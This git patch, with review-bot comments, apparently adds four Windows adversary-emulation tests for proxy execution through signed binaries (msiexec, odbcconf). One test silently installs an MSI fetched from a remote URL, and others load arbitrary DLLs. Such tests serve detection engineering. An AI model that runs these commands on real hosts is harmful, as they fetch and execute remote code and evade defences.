From e2309b30af0baf8c832e16ff700c92e5fec3aa7f Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 8 Nov 2019 19:57:19 -0600 Subject: [PATCH] T1218 proxied binary execution tests (#628) * Added proxied binary execution tests * Generate docs from job=validate_atomics_generate_docs branch=t1218_tests --- atomics/T1218/T1218.md | 92 ++++++++++++++++++++++++++++++ atomics/T1218/T1218.yaml | 69 ++++++++++++++++++++++ atomics/index.md | 8 +++ atomics/index.yaml | 120 +++++++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 8 +++ 5 files changed, 297 insertions(+) diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 6c51bc99..ea0f4256 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -33,6 +33,14 @@ Several other binaries exist that may be used to perform similar behavior. (Cita - [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll) +- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file) + +- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file) + +- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll) + +- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll) +
@@ -97,4 +105,88 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} +
+
+ +## Atomic Test #4 - Msiexec.exe - Execute Local MSI file +Execute arbitrary MSI file. Commonly seen in application installation. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi| + +#### Run it with `command_prompt`! +``` +msiexec.exe /q /i "#{msi_payload}" +``` + + + +
+
+ +## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file +Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| msi_payload | MSI file to execute | String | http://site.com/file.msi| + +#### Run it with `command_prompt`! +``` +msiexec.exe /q /i "#{msi_payload}" +``` + + + +
+
+ +## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL +Execute arbitrary DLL file stored locally. Commonly seen in application installation. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| + +#### Run it with `command_prompt`! +``` +msiexec.exe /y "#{dll_payload}" +``` + + + +
+
+ +## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL +Execute arbitrary DLL file stored locally. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| + +#### Run it with `command_prompt`! +``` +odbcconf.exe /S /A {REGSVR "#{dll_payload}"} +``` + + +
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 3909a4dc..0be10657 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -58,3 +58,72 @@ atomic_tests: name: command_prompt command: | C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} + +- name: Msiexec.exe - Execute Local MSI file + description: | + Execute arbitrary MSI file. Commonly seen in application installation. + + supported_platforms: + - windows + + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: | + msiexec.exe /q /i "#{msi_payload}" + +- name: Msiexec.exe - Execute Remote MSI file + description: | + Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. + + supported_platforms: + - windows + + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: | + msiexec.exe /q /i "#{msi_payload}" + +- name: Msiexec.exe - Execute Arbitrary DLL + description: | + Execute arbitrary DLL file stored locally. Commonly seen in application installation. + + supported_platforms: + - windows + + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: | + msiexec.exe /y "#{dll_payload}" + +- name: Odbcconf.exe - Execute Arbitrary DLL + description: | + Execute arbitrary DLL file stored locally. + + supported_platforms: + - windows + + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: | + odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + 
diff --git a/atomics/index.md b/atomics/index.md index 5eb5240d..2be43da7 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -342,6 +342,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -710,6 +714,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - [T1153 Source](./T1153/T1153.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 8144122a..b6246769 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -10237,6 +10237,66 @@ defense-evasion: name: command_prompt command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload} \n" + - name: Msiexec.exe - Execute Local MSI file + description: 'Execute arbitrary MSI file. Commonly seen in application installation. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Remote MSI file + description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen + in application installation, commonly seen in malware execution. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. Commonly seen in application + installation. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: "msiexec.exe /y \"#{dll_payload}\" \n" + - name: Odbcconf.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + +' T1216: technique: x_mitre_data_sources: 
@@ -20397,6 +20457,66 @@ execution: name: command_prompt command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload} \n" + - name: Msiexec.exe - Execute Local MSI file + description: 'Execute arbitrary MSI file. Commonly seen in application installation. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Remote MSI file + description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen + in application installation, commonly seen in malware execution. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. Commonly seen in application + installation. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: "msiexec.exe /y \"#{dll_payload}\" \n" + - name: Odbcconf.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + +' T1216: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a956d34f..181ee513 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -132,6 +132,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -572,6 +576,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
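Review bot: In the `atomics/T1218/T1218.md` hunk at `@@ -97,4 +105,88 @@`, tests #4, #6 and #7 default to `PathToAtomicsFolder\T1218\src\Win32\T1218.msi` and `PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll`, but the diffstat lists only the five markdown/YAML files (297 insertions, no binaries), so unless those two payloads are already present under `src\Win32` the tests fail on first run; please add them to the PR or state that they already exist, and document what each payload does when it runs so the benign behaviour can be reviewed. The description of test #6, "Execute arbitrary DLL file stored locally. Commonly seen in application installation.", is also misleading: `msiexec.exe /y` calls the DLL's DllRegisterServer export outside of any MSI install, which is exactly the proxy-execution behaviour this technique covers, and tests #6 and #7 register the same `T1218-2.dll`, differing only in the parent process (`msiexec.exe` versus `odbcconf.exe`); suggest wording the descriptions to say so, since that is the distinction a detection engineer would want to see spelled out.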
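Review bot: In the `atomics/T1218/T1218.yaml` hunk at `@@ -58,3 +58,72 @@`, none of the four new tests carries a `cleanup_command`, yet #4 installs a product (`msiexec.exe /q /i`), #6 registers the DLL via `msiexec.exe /y`, and #7 registers it via `odbcconf.exe /S /A {REGSVR ...}`, so repeated runs do not start from a clean state and the registration persists on the test host. Suggest adding `cleanup_command: msiexec.exe /q /x "#{msi_payload}"` to #4 and `cleanup_command: msiexec.exe /z "#{dll_payload}"` to #6 (`/z` is the DllUnregisterServer counterpart of `/y`), and documenting how #7's registration is reverted. The hunk also ends with a whitespace-only `+ ` line after the `odbcconf.exe` command; drop it so the file does not end with trailing whitespace.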
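Review bot: In the `atomics/index.yaml` hunk at `@@ -10237,6 +10237,66 @@` (and the matching `T1218.md`/`T1218.yaml` entries), the "Execute Remote MSI file" test defaults `msi_payload` to `http://site.com/file.msi`, a domain the project does not control, so `msiexec.exe /q /i` run with the default either fails on a missing file or silently installs whatever that host happens to serve. Suggest an obviously placeholder default such as `http://<your-host>/T1218.msi` with the description stating that the user must host the project's own `T1218.msi` themselves (keeping `type: String`, since the value is a URL rather than a path), so the remote variant exercises the same known payload as test #4.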